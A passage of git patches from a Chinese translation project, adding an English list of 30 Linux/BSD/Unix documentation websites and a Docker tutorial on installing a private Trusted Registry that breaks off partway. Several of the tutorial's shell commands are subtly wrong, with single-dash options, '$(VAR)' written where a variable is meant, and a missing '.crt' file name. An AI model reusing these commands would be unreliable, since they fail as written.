+via: https://opensource.com/article/18/1/rocking-docs-mycroft
+
+作者:[Kathy Reid][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/kathyreid
+[1]:https://opensource.com/users/aneta
+[2]:https://opensource.com/article/17/10/doc-audits
+[3]:/file/382466
+[4]:https://opensource.com/sites/default/files/images/life-uploads/mycroft-documentation-audit.png (mycroft documentation audit)
+[5]:https://git-scm.com/
+[6]:https://github.com/MycroftAI
+[7]:https://en.wikipedia.org/wiki/Markdown
+[8]:https://www.wordpress.org/
+[9]:https://github.com/
+[10]:https://github.com/mycroftai
+[11]:http://mycroft.ai/team/
+[12]:https://wordpress.org/plugins/parsedown-party/
+[13]:https://developer.wordpress.org/themes/template-files-section/page-template-files/
+[14]:https://marketingland.com/estimated-reading-times-increase-engagement-79830
+[15]:https://jasonyingling.me/reading-time-wp/
+[16]:https://multiratingpro.com/
+[17]:https://github.com/MycroftAI/docs-rewrite/blob/master/README.md
+[18]:https://wordpress.org/plugins/wp-anchor-header/
+[19]:https://github.com/jonschlinkert/markdown-toc
+[20]:https://mycroft.ai/documentation
+[21]:https://chat.mycroft.ai/
+[22]:mailto:kathy.reid@mycroft.ai
+[23]:https://mycroft.ai/blog/improving-mycrofts-documentation/
From c17a03f1a00d9b10f5d3df67ad3da2cb39c4bf50 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:31:16 +0800
Subject: [PATCH 244/371] add done: 20180109 How Mycroft used WordPress and
GitHub to improve its documentation.md
---
...roft used WordPress and GitHub to improve its documentation.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md (100%)
diff --git a/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md b/sources/talk/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
similarity index 100%
rename from sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
rename to sources/talk/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
From ccc5de4f003c09954f94baf4ff08971d7f96f060 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:40:41 +0800
Subject: [PATCH 245/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2030=20Best=20Sourc?=
=?UTF-8?q?es=20For=20Linux=20/=20*BSD=20/=20Unix=20Documentation=20On=20t?=
=?UTF-8?q?he=20Web?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... - -BSD - Unix Documentation On the Web.md | 458 ++++++++++++++++++
1 file changed, 458 insertions(+)
create mode 100644 sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
diff --git a/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md b/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
new file mode 100644
index 0000000000..ac35f7c596
--- /dev/null
+++ b/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
@@ -0,0 +1,458 @@
+30 Best Sources For Linux / *BSD / Unix Documentation On the Web
+======
+Man pages are written by sys-admin and developers for IT techs, and are intended more as a reference than as a how to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for particular commands or configuration file, but they are not helpful for new Linux users. Man pages are not good for learning something new for the first time. Here are thirty best documentation sites on the web for learning Linux and Unix like operating systems.
+
+![Dennis Ritchie and Ken Thompson working with UNIX PDP11][1]
+
+Please note that BSD manpages are usually better as compare to Linux.
+
+## #1: Red Hat Enterprise Linux
+
+![Red hat Enterprise Linux Docs][2]
+
+RHEL is developed by Red Hat and targeted toward the commercial market. It has one of the best documentations covering basis of RHEL to advanced topics like security, SELinux, virtualization, directory server, clustering, JBOSS, HPC, and much more. Red Hat documentation has been translated into twenty-two languages and is available in multi-page HTML, single-page HTML, PDF, and EPUB formats. The good news is you can use the same documentation for CentOS or Scientific Linux (community enterprise distros). All of these documents ship with the OS, so if you don't have a network connection, then you have them there as well. The RHEL docs **covers everything from installation to configuring clusters**. The only downside is you need to be a paid customer. This is perfect for an enterprise company.
+
+ 1. RHEL Documentation: [in HTML/PDF format][3]
+ 2. Support forums: Only available to Red Hat customer portal to submit a support case.
+
+
+
+### A Note About CentOS Wiki and Forums
+
+![Centos Linux Wiki][4]
+
+CentOS (Community ENTerprise Operating System) is a free rebuild of source packages freely available from a RHEL. It provides truly reliable, free enterprise Linux for personal and other usage. You will get RHEL stability without the cost of certification and support. CentOS wiki divided into Howtos, Tips & Tricks, and much more at the following locations:
+
+ 1. [Documentation Wiki][87]
+ 2. [Support forum][88]
+
+## #2: Arch Wiki and Forums
+
+![Arch Linux wiki and tutorials][5]
+
+Arch Linux is an independently developed, Linux operating system and it comes with pretty good documentation in form of wiki based site. It is developed collaboratively by a community of Arch users, allowing any user to add and edit content. The articles are divided into various categories like [networking][6], optimization, package management, system administration, X window system, and getting & installing Arch Linux. The official [forums][7] are useful for solving many issues. It has total 40k+ registered users with over 1 million posts. The wiki contains some **general information that can also apply in other Linux distros**.
+
+ 1. Arch community Documentation: [Wiki format][8]
+ 2. Support forums: [Yes][7]
+
+
+
+## #3: Gentoo Linux Wiki and Forums
+
+![Gentoo Linux Handbook and Wiki][9]
+
+Gentoo Linux is based on the Portage package management system. The Gentoo user compiles the source code locally according to their chosen configuration. The majority of users have configurations and sets of installed programs which are unique to themselves. The Gentoo give you some explanation about the Gentoo Linux and answer most of your questions regarding installations, packages, networking, and much more. Gentoo has **very helpful forum** with over one hundred thirty-four thousand plus users who have posted a total of 5442416 articles.
+
+ 1. Gentoo community documentation: [Handbook][10] and [Wiki format][11]
+ 2. Support forums: [Yes][12]
+ 3. User-supplied documentation available at [gentoo-wiki.com][13]
+
+
+
+## #4: Ubuntu Wiki and Documentation
+
+Ubuntu is one of the leading desktop and laptop distro. The official documentation developed and maintained by the Ubuntu Documentation Project. You can access a wealth of information including a getting started Guide. The best part is information contained herein may also work with other Debian-based systems. You will also find the community documentation for Ubuntu created by its users. This is a reference for Ubuntu-related 'Howtos, Tips, Tricks, and Hacks'. Ubuntu Linux has one of the biggest Linux communities on the web. It offers help to the both new and experienced users.
+
+![Ubuntu Linux Wiki and Forums][14]
+
+ 1. Ubuntu community documentation: [wiki format][15].
+ 2. Ubuntu official documentation: [wiki format][16].
+ 3. Support forums: [Yes][17].
+
+
+
+## #5: IBM Developer Works
+
+IBM developer works offers technical resources for Linux programmers and system administrators. It contains hundreds of articles, tutorials, and tips to help developers with Linux programming and application development, as well as Linux system administration.
+
+![IBM: Technical for Linux programmers and system administrators][18]
+
+ 1. IBM Developer Works Documentation: [HTML format][19]
+ 2. Support forums: [Yes][20].
+
+
+
+## #6: FreeBSD Documentation and Handbook
+
+The FreeBSD handbook is created by the FreeBSD Documentation Project. It describes the installation, administration and day-to-day use of the FreeBSD OS. BSD manpages are usually better as compare to GNU/Linux man pages. The FreeBSD **comes with all the documents** with upto date man pages. The FreeBSD Handbook **covers everything**. The handbook contains some general Unix information that can also apply in other Linux distros. The official FreeBSD forums also provides helps whenever you will get stuck with problems.
+
+![Freebsd Documentation][21]
+
+ 1. FreeBSD Documentation: [HTML/PDF format][90]
+ 2. Support forums: [Yes][91].
+
+
+## #7: Bash Hackers Wiki
+
+![Bash hackers wiki for bash users][22]
+This is an excellent resource for bash user. The bash hackers wiki is intended to hold documentations of any kind about the GNU Bash. The main motivation was to provide human-readable documentation and information to not force users to read every bit of the Bash manpage - which is hard sometimes. The wiki is divided into various sections such as - scripting and general information, howtos, coding style, bash syntax, and much more.
+
+ 1. Bash hackers [wiki][23] in wiki format
+
+
+
+## #8: Bash FAQ
+
+![Bash FAQ: Answers to frequently asked questions about GNU/BASH][24]
+A wiki designed for new bash users. It has good collections to frequently asked questions on channel #bash on the freenode IRC network. These answers are contributed by the regular members of the channel. Don't forget to check out common mistakes made by Bash programmers, in [BashPitfalls][25] section. The answers given in this FAQ may be slanted toward Bash, or they may be slanted toward the lowest common denominator Bourne shell, depending on who wrote the answer. In most cases, an effort is made to provide both a portable (Bourne) and an efficient (Bash, where appropriate) answer.
+
+ 1. Bash FAQ [in wiki ][26] format.
+
+
+
+## #9: Howtoforge - Linux Tutorials
+
+![Howtoforge][27]
+
+Fellow blogger Falko has some great stuff over at How-To Forge. The site provides Linux tutorials about various topic including its famous "The Perfect Server" series. The site is divided into various topics such as web-server, Linux distros, DNS servers, Virtualization, High-availability, Email and anti-spam, FTP servers, programming topics, and much more. The site is also available in German language.
+
+ 1. Howtoforge [in html][28] format.
+ 2. Support forums: Yes
+
+
+
+## #10: OpenBSD FAQ and Documentation
+
+![OpenBSD Documenation][29]
+
+OpenBSD is another Unix-like computer operating system based on Berkeley Software Distribution (BSD). It was forked from NetBSD by project. The OpenBSD is well known for the **quality code, documentation** , uncompromising position on software licensing, with strong focus on security. The documenation is divided into various topics such as - installations, package management, firewall setup, user management, networking, disk / RAID management and much more.
+
+ 1. OpenBSD [in html][30] format.
+ 2. Support forums: No, but [mail lists][31] are available.
+
+
+
+## #11: Calomel - Open Source Research and Reference
+
+This amazing site dedicated to documenting open source software, and programs with special focus on OpenBSD. This is one of the cleanest and easy to to navigate website, with focus on the quality content. The site is divided into various server topic such as DNS, OpeBSD, security, web-server, Samba file server, various tools, and much more.
+
+![Open Source Research and Reference Documentation][32]
+
+ 1. Calomel Org [in html][33] format.
+ 2. Support forums: No
+
+
+
+## #12: Slackware Book Project
+
+![Slackware Linux Book and Documentation ][34]
+Slackware Linux was my first distro. It was one of the earliest distro based on the Linux kernel and is the oldest currently being maintained. The distro is targeted towards power users with strong focus on stability. Slackware is one of few the most "Unix-like" Linux distribution. The official slackware book is designed to get you started with the Slackware Linux operating system. It's not meant to cover every single aspect of the distribution, but rather to show what it is capable of and give you a basic working knowledge of the system. The book is divided into various topics such as Installation, Network & System Configuration, System administration, Package management, and much more.
+
+ 1. Slackware [Linux books in html][35], pdf, and other format.
+ 2. Support forums: Yes
+
+
+
+## #13: The Linux Documentation Project (TLDP)
+
+![Linux Learning Site and Documentation ][36]
+
+The Linux Documentation Project is working towards developing free, high quality documentation for the Linux operating system. The site is created and maintained by volunteers. The site is divided into subject-specific help, longer and in-depth guide books, and much more. I recommend [this document][37] which is both a tutorial and a reference on shell scripting with Bash. The [single list][38] of HOWTOs is also a good starting point for new users.
+
+ 1. The Linux [documentation project][39] available in multiple formats.
+ 2. Support forums: No
+
+
+
+## #14: Linux Home Networking
+
+![Linux Home Networking ][40]
+
+Linux home networking is another good resource for learning Linux. This site covers topics needed for Linux software certification exams, such as the RHCE, and many computer training courses. The site is divided into various topics such as networking, samba file server, wirless networking, web-server, and much more.
+
+ 1. Linux [home networking][41] available in html and PDF (with small fee) formats.
+ 2. Support forums: Yes
+
+
+
+## #15: Linux Action Show
+
+![Linux Podcast ][42]
+
+Linux Action Show ("LAS") is a podcast about Linux. The show is hosted by Bryan Lunduke, Allan Jude, and Chris Fisher. It covers the latest news in the FOSS world. The show reviews various apps and Linux distros. Sometime an interview with a major personal in the open source world is posted on the show.
+
+ 1. Linux [action show][43] available in audio/video format.
+ 2. Support forums: Yes
+
+
+
+## #16: Commandlinefu
+
+Commandlinefu lists various shell commands that you may find interesting and useful. All commands can be commented on, discussed and voted up or down. Ths is an awesome resource for all Unix command line users. Don't forget to checkout all [top voted][44] commands here.
+
+![The best Unix / Linux Commands By Commandlinefu][45]
+
+ 1. [Commandlinefu][46] available in html format.
+ 2. Support forums: No
+
+
+
+## #17: Debian Administration Tips and Resources
+
+This site covers topics, tips, and tutorial only related to Debian GNU/Linux. It contain interesting and useful information related to the System Administration. You can contribute an article, tip, or question here. Don't forget to checkout [top articles][47] posted in the hall of fame section.
+![Debian Linux Adminstration: Tips and Tutorial For Sys Admin][48]
+
+ 1. Debian [administration][49] available in html format.
+ 2. Support forums: No
+
+
+
+## #18: Catonmat - Sed, Awk, Perl Tutorials
+
+![Sed, Awk, Perl Tutorials][50]
+
+This site run by a fellow blogger Peteris Krumins. The main focus is on command line and Unix programming topics such as sed, perl, awk, and others. Don't forget to check out [introduction to sed][51], sed [one liner][52] explained, the definitive [guide][53] to Bash Command line history, and [awk][54] liner explained.
+
+ 1. [catonmat][55] available in html format.
+ 2. Support forums: No
+
+
+
+## #19: Debian GNU/Linux Documentation and Wiki
+
+![Debian Linux Tutorials and Wiki][56]
+
+Debian is another Linux based operating system that primarily uses software released under the GNU General Public. Debian is well known for strict adherence to the philosophies of Unix and free software. It is also one of popular and influential Linux distribution. It is also used as a base for many other distributions such as Ubuntu and others. The Debian project provides its users with proper documentation in an easily accessible form. The site is divided into wiki, installation guide, faqs, and support forum.
+
+ 1. Debian GNU/Linux [documentation][57] available in html and other format.
+ 2. Debian GNU/Linux [wiki][58]
+ 3. Support forums: [Yes][59]
+
+
+
+## #20: Linux Sea
+
+The book "Linux Sea" offers a gentle yet technical (from end-user perspective) introduction to the Linux operating system, using Gentoo Linux as the example Linux distribution. It does not nor will it ever talk about the history of the Linux kernel or Linux distributions or dive into details that are less interesting for Linux users.
+
+ 1. Linux [sea][60] available in html format.
+ 2. Support forums: No
+
+
+
+## #21: Oreilly Commons
+
+![Oreilly Free Linux / Unix / Php / Javascript / Ubuntu Books][61]
+
+The oreilly publishing house has posted quite a few titles in wiki format for all. The purpose of this site is to provide content to communities that would like to create, reference, use, modify, update and revise material from O'Reilly or other sources. The site includes books about Ubuntu, Php, Spamassassin, Linux, and much more all for free.
+
+ 1. Oreilly [commons][62] available in wiki format.
+ 2. Support forums: No
+
+
+
+## #22: Ubuntu Pocket Guide
+
+![Ubuntu Book For New Users][63]
+
+This book is written by Keir Thomas. This guide/book is a good read for everyday Ubuntu user. The purpose of this book is to introduce you to the Ubuntu operating system, and the philosophy that underpins it. You can download a pdf version from the official site or order a print version using Amazon.
+
+ 1. Ubuntu [pocket guide][64] available in pdf and print formats.
+ 2. Support forums: No
+
+
+
+## #23: Linux: Rute User's Tutorial and Exposition
+
+![GNU/LINUX system administration book][65]
+
+This book covers GNU/LINUX system administration, for popular distributions like RedHat and Debian, as a tutorial for new users and a reference for advanced administrators. It aims to give concise, thorough explanations and practical examples of each aspect of a UNIX system. Anyone who wants a comprehensive text on (what is commercially called) LINUX need look no further-there is little that is not covered here.
+
+ 1. Linux: [Rute User's Tutorial and Exposition][66] available in print and html formats.
+ 2. Support forums: No
+
+
+
+## #24: Advanced Linux Programming
+
+![Advanced Linux Programming][67]
+
+This book is intended for the programmer already familiar with the C programming language. It take a tutorial approach and teach the most important concepts and power features of the GNU/Linux system in application programs. If you're a developer already experienced with programming for the GNU/Linux system, are experienced with another UNIX-like system and are interested in developing GNU/Linux software, or want to make the transition for a non-UNIX environment and are already familiar with the general principles of writing good software, this book is for you. In addition, you will find that this book is equally applicable to C and C++ programming.
+
+ 1. Advanced [Linux programming][68] available in print and pdf formats.
+ 2. Support forums: No
+
+
+
+## #25: LPI 101 Course Notes
+
+![Linux Professional Institute Certification Books][69]
+
+LPIC-1/2/3 levels are certification for Linux administrators. This site provides training manuals for LPI 101 and 102 exams. These are licenced under the GNU Free Documentation Licence (FDL). This course material is based on the objectives for the Linux Professionals Institutea€™s LPI 101 and 102 examination. The course is intended to provide you with the skills required for operating and administering Linux systems.
+
+ 1. Download LPI [training manuals][70] in pdf format.
+ 2. Support forums: No
+
+
+
+## #26: FOSS Manuals
+
+FLOSS Manuals is a collection of manuals about free and open source software together with the tools used to create them and the community that uses those tools. They include authors, editors, artists, software developers, activists, and many others. There are manuals that explain how to install and use a range of free and open source softwares, about how to do things (like design or stay safe online) with open source software, and manuals about free culture services that use or support free software and formats. You will find manuals about software such as VLC, [Linux video editing][71], Linux, OLPC / SUGAR, GRAPHICS, and much more.
+
+![FLOSS Manuals is a collection of manuals about free and open source software][72]
+
+ 1. You can browse [FOSS manuals][73] in wiki format.
+ 2. Support forums: No
+
+
+
+## #27: Linux Starter Pack
+
+![The Linux Starter Pack][74]
+
+New to the wonderful world of Linux? Looking for an easy way to get started? You can download 130-page guide and get to grips with the OS. This will show you how to install Linux onto your PC, navigate around the desktop, master the most popular Linux programs and fix any problems that may arise.
+
+ 1. Download [Linux starter][75] pack in pdf format.
+ 2. Support forums: No
+
+
+
+## #28: Linux.com - The Source of Linux Info
+
+Linux.com is a product of the Linux Foundation. The side provides news, guides, tutorials and other information about Linux by harnessing the power of Linux users worldwide to inform, collaborate and connect on all matters Linux.
+
+ 1. Visit [Linux.com][76] online.
+ 2. Support forums: Yes
+
+
+
+## #29: LWN
+
+LWN is a site with an emphasis on free software and software for Linux and other Unix-like operating systems. It consists of a weekly issue, separate stories which are published most days, and threaded discussion attached to every story. The site provide comprehensive coverage of development, legal, commercial, and security issues related to Linux and FOSS.
+
+ 1. Visit [lwn.net][77] online.
+ 2. Support forums: No
+
+
+
+## #30: Mac OS X Related sites
+
+A quick links to Max OS X related sites:
+
+ * [Mac OS X Hints][78] - This site is dedicated to the Apple's Mac OS X unix operating systems. It has tons of tips, tricks and tutorial about Bash, and OS X
+ * [Mac OS development library][79] - Apple has good collection related to OS X development. Don't forget to checkout [bash shell scripting primer][80].
+ * [Apple kbase][81] - This is like RHN kbase. It provides guides and troublshooting tips for all apple products including OS X.
+
+
+
+## #30: NetBSD
+
+NetBSD is another free open source operating system based upon the Berkeley Software Distribution (BSD) Unix operating system. The NetBSD project is primarily focused on high quality design, stability and performance of the system. Due to its portability and Berkeley-style license, NetBSD is often used in embedded systems. This site provides links to the official NetBSD documentation and also links to various external documents.
+
+ 1. View [netbsd][82] documentation online in html / pdf format.
+ 2. Support forums: No
+
+
+
+## Your Turn:
+
+This is my personal list and it is not absolutely definitive, so if you've got your own favorite Unix/Linux specific site, share in the comments below.
+
+// Image credit: [Flickr photo][83] by PanelSwitchman. Some links are suggested by user on our facebook fan page.
+
+// For those who celebrate, Merry Christmas! For everyone else, enjoy the weekend.
+
+## About the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][84], [Facebook][85], [Google+][86].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/tips/2011/12/unix-pdp11.jpg (Dennis Ritchie and Ken Thompson working with UNIX PDP11)
+[2]:https://www.cyberciti.biz/media/new/tips/2011/12/redhat-enterprise-linux-docs-150x150.png (Red hat Enterprise Linux Docs)
+[3]:https://access.redhat.com/documentation/en-us/
+[4]:https://www.cyberciti.biz/media/new/tips/2011/12/centos-linux-wiki-150x150.png (Centos Linux Wiki, Support, Documents)
+[5]:https://www.cyberciti.biz/media/new/tips/2011/12/arch-linux-wiki-150x150.png (Arch Linux wiki and tutorials )
+[6]:https://wiki.archlinux.org/index.php/Category:Networking_%28English%29
+[7]:https://bbs.archlinux.org/
+[8]:https://wiki.archlinux.org/
+[9]:https://www.cyberciti.biz/media/new/tips/2011/12/gentoo-linux-wiki1-150x150.png (Gentoo Linux Handbook and Wiki)
+[10]:http://www.gentoo.org/doc/en/handbook/
+[11]:https://wiki.gentoo.org
+[12]:https://forums.gentoo.org/
+[13]:http://gentoo-wiki.com
+[14]:https://www.cyberciti.biz/media/new/tips/2011/12/ubuntu-linux-wiki.png (Ubuntu Linux Wiki and Forums)
+[15]:https://help.ubuntu.com/community
+[16]:https://help.ubuntu.com/
+[17]:https://ubuntuforums.org/
+[18]:https://www.cyberciti.biz/media/new/tips/2011/12/ibm-devel.png (IBM: Technical for Linux programmers and system administrators)
+[19]:https://www.ibm.com/developerworks/learn/linux/index.html
+[20]:https://www.ibm.com/developerworks/community/forums/html/public?lang=en
+[21]:https://www.cyberciti.biz/media/new/tips/2011/12/freebsd-docs.png (Freebsd Documentation)
+[22]:https://www.cyberciti.biz/media/new/tips/2011/12/bash-hackers-wiki-150x150.png (Bash hackers wiki for bash users)
+[23]:http://wiki.bash-hackers.org/doku.php
+[24]:https://www.cyberciti.biz/media/new/tips/2011/12/bash-faq-150x150.png (Bash FAQ: Answers to frequently asked questions about GNU/BASH)
+[25]:http://mywiki.wooledge.org/BashPitfalls
+[26]:https://mywiki.wooledge.org/BashFAQ
+[27]:https://www.cyberciti.biz/media/new/tips/2011/12/howtoforge-150x150.png (Howtoforge tutorials)
+[28]:https://howtoforge.com/
+[29]:https://www.cyberciti.biz/media/new/tips/2011/12/openbsd-faq-150x150.png (OpenBSD Documenation)
+[30]:https://www.openbsd.org/faq/index.html
+[31]:https://www.openbsd.org/mail.html
+[32]:https://www.cyberciti.biz/media/new/tips/2011/12/calomel_org.png (Open Source Research and Reference Documentation)
+[33]:https://calomel.org
+[34]:https://www.cyberciti.biz/media/new/tips/2011/12/slackware-linux-book-150x150.png (Slackware Linux Book and Documentation )
+[35]:http://www.slackbook.org/
+[36]:https://www.cyberciti.biz/media/new/tips/2011/12/tldp-150x150.png (Linux Learning Site and Documentation )
+[37]:http://tldp.org/LDP/abs/html/index.html
+[38]:http://tldp.org/HOWTO/HOWTO-INDEX/howtos.html
+[39]:http://tldp.org/
+[40]:https://www.cyberciti.biz/media/new/tips/2011/12/linuxhomenetworking-150x150.png (Linux Home Networking )
+[41]:http://www.linuxhomenetworking.com/
+[42]:https://www.cyberciti.biz/media/new/tips/2011/12/linux-action-show-150x150.png (Linux Podcast )
+[43]:http://www.jupiterbroadcasting.com/show/linuxactionshow/
+[44]:https://www.commandlinefu.com/commands/browse/sort-by-votes
+[45]:https://www.cyberciti.biz/media/new/tips/2011/12/commandlinefu.png (The best Unix / Linux Commands )
+[46]:https://commandlinefu.com/
+[47]:https://www.debian-administration.org/hof
+[48]:https://www.cyberciti.biz/media/new/tips/2011/12/debian-admin.png (Debian Linux Adminstration: Tips and Tutorial For Sys Admin)
+[49]:https://www.debian-administration.org/
+[50]:https://www.cyberciti.biz/media/new/tips/2011/12/catonmat-150x150.png (Sed, Awk, Perl Tutorials)
+[51]:http://www.catonmat.net/blog/worlds-best-introduction-to-sed/
+[52]:https://www.catonmat.net/blog/sed-one-liners-explained-part-one/
+[53]:https://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/
+[54]:https://www.catonmat.net/blog/awk-one-liners-explained-part-one/
+[55]:https://catonmat.net/
+[56]:https://www.cyberciti.biz/media/new/tips/2011/12/debian-wiki-150x150.png (Debian Linux Tutorials and Wiki)
+[57]:https://www.debian.org/doc/
+[58]:https://wiki.debian.org/
+[59]:https://www.debian.org/support
+[60]:http://swift.siphos.be/linux_sea/
+[61]:https://www.cyberciti.biz/media/new/tips/2011/12/orelly-150x150.png (Oreilly Free Linux / Unix / Php / Javascript / Ubuntu Books)
+[62]:http://commons.oreilly.com/wiki/index.php/O%27Reilly_Commons
+[63]:https://www.cyberciti.biz/media/new/tips/2011/12/ubuntu-guide-150x150.png (Ubuntu Book For New Users)
+[64]:http://ubuntupocketguide.com/
+[65]:https://www.cyberciti.biz/media/new/tips/2011/12/rute-150x150.png (GNU/LINUX system administration free book)
+[66]:https://web.archive.org/web/20160204213406/http://rute.2038bug.com/rute.html.gz
+[67]:https://www.cyberciti.biz/media/new/tips/2011/12/advanced-linux-programming-150x150.png (Download Advanced Linux Programming PDF version)
+[68]:https://github.com/MentorEmbedded/advancedlinuxprogramming
+[69]:https://www.cyberciti.biz/media/new/tips/2011/12/lpic-150x150.png (Download Linux Professional Institute Certification PDF Book)
+[70]:http://academy.delmar.edu/Courses/ITSC1358/eBooks/LPI-101.LinuxTrainingCourseNotes.pdf
+[71]://www.cyberciti.biz/faq/top5-linux-video-editing-system-software/
+[72]:https://www.cyberciti.biz/media/new/tips/2011/12/floss-manuals.png (Download manuals about free and open source software)
+[73]:https://flossmanuals.net/
+[74]:https://www.cyberciti.biz/media/new/tips/2011/12/linux-starter-150x150.png (New to Linux? Start Linux starter book [ PDF version ])
+[75]:http://www.tuxradar.com/linuxstarterpack
+[76]:https://linux.com
+[77]:https://lwn.net/
+[78]:http://hints.macworld.com/
+[79]:https://developer.apple.com/library/mac/navigation/
+[80]:https://developer.apple.com/library/mac/#documentation/OpenSource/Conceptual/ShellScripting/Introduction/Introduction.html
+[81]:https://support.apple.com/kb/index?page=search&locale=en_US&q=
+[82]:https://www.netbsd.org/docs/
+[83]:https://www.flickr.com/photos/9479603@N02/3311745151/in/set-72157614479572582/
+[84]:https://twitter.com/nixcraft
+[85]:https://facebook.com/nixcraft
+[86]:https://plus.google.com/+CybercitiBiz
+[87]:https://wiki.centos.org/
+[88]:https://www.centos.org/forums/
+[90]: https://www.freebsd.org/docs.html
+[91]: https://forums.freebsd.org/
From 325b2c5e68d6c35eaa480fc0f7f1a38d3ce5ffca Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:45:24 +0800
Subject: [PATCH 246/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Using=20Your=20Ow?=
=?UTF-8?q?n=20Private=20Registry=20with=20Docker=20Enterprise=20Edition?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Registry with Docker Enterprise Edition.md | 126 ++++++++++++++++++
1 file changed, 126 insertions(+)
create mode 100644 sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
diff --git a/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md b/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
new file mode 100644
index 0000000000..88b1eb96e1
--- /dev/null
+++ b/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
@@ -0,0 +1,126 @@
+Using Your Own Private Registry with Docker Enterprise Edition
+======
+
+![docker trusted registry][1]
+
+One of the things that makes Docker really cool, particularly compared to using virtual machines, is how easy it is to move around Docker images. If you've already been using Docker, you've almost certainly pulled images from [Docker Hub][2]. Docker Hub is Docker's cloud-based registry service and has tens of thousands of Docker images to choose from. If you're developing your own software and creating your own Docker images though, you'll want your own private Docker registry. This is particularly true if you have images with proprietary licenses, or if you have a complex continuous integration (CI) process for your build system.
+
+Docker Enterprise Edition includes Docker Trusted Registry (DTR), a highly available registry with secure image management capabilities which was built to run either inside of your own data center or on your own cloud-based infrastructure. In the next few weeks, we'll go over how DTR is a critical component of delivering a secure, repeatable and consistent [software supply chain][3]. You can get started with it today through our [free hosted demo][4] or by downloading and installing the free 30-day trial. The steps to get started with your own installation are below.
+
+## Setting Up Docker Enterprise Edition
+
+Docker Trusted Registry runs on top of Universal Control Plane (UCP), so to begin let's install a single-node cluster. If you've already got your own UCP cluster, you can skip this step. On your docker host, run the command:
+
+```
+# Pull and install UCP
+
+docker run -it -rm -v /var/run/docker.sock:/var/run/docker.sock -name ucp docker/ucp:latest install
+```
+
+Once UCP is up and running, there are a few more things you should do before you install DTR. Open up your browser against the UCP instance you just installed. There should be a link to it at the end of your log output. If you have already have a Docker Enterprise Edition license, go ahead and upload it through the UI. If you don't, visit the [Docker Store][5] and pick up a free, 30-day trial.
+
+Once you've got licensing squared away, you're probably going to want to change the port which UCP is running on. Since this is a single node cluster, DTR and UCP are going to want to use the same TCP ports for running their web services. If you've got a UCP swarm with more than one node, this probably isn't a problem because DTR will look for a node which has the required free ports. Inside of UCP, click on Admin Settings -> Cluster Configuration and change the Controller Port to something like 5443.
+
+## Installing DTR
+
+We're going to install a simple, single-node instance of Docker Trusted Registry. If you were setting up your DTR for production use, you would likely set things up in High Availability (HA) mode which would require a different type of storage such as a cloud-based object store, or NFS. Since this is a single-node instance, we're going to stick with the default local storage.
+
+First we need to pull the DTR bootstrap image. The bootstrap image is a tiny, self-contained installer which connects to UCP and sets up all of the containers, volumes, and logical networks required to get DTR up and running.
+
+Use the command:
+
+```
+# Pull and run the DTR bootstrapper
+
+docker run -it -rm docker/dtr:latest install -ucp-insecure-tls
+```
+
+NOTE: Both UCP and DTR by default come with their own certs which won't be recognized by your system. If you've set up UCP with TLS certs which are trusted by your system, you can omit the `-ucp-insecure-tls` option. Alternatively, you can use the `-ucp-ca` option which will let you specify the UCP CA certificate directly.
+
+The DTR bootstrap image should then ask you for a couple of settings, such as the URL of your UCP installation and your UCP admin username and password. It should only take a minute or two to pull all of the DTR images and set everything up.
+
+## Keeping Everything Secure
+
+Once everything is up and running, you're ready to push and pull images to and from
+
+the registry. Before we do that step though, let's set up our TLS certificates so that we can securely talk to DTR.
+
+On Linux, we can use these commands (just make certain you change DTR_HOSTNAME to reflect the DTR we just set up):
+
+```
+# Pull the CA certificate from DTR (you can use wget if curl is unavailable)
+
+DTR_HOSTNAME=
+
+curl -k https://$(DTR_HOSTNAME)/ca > $(DTR_HOSTNAME).crt
+
+sudo mkdir /etc/docker/certs.d/$(DTR_HOSTNAME)
+
+sudo cp $(DTR_HOSTNAME) /etc/docker/certs.d/$(DTR_HOSTNAME)
+
+# Restart the docker daemon (use `sudo service docker restart` on Ubuntu 14.04)
+
+sudo systemctl restart docker
+```
+
+On Docker for Mac and Windows, we'll set up our client a little bit differently. Go in to Settings -> Daemon and in the Insecure Registries section, enter in your DTR hostname. Click Apply, and your docker daemon should restart and you should be good to go.
+
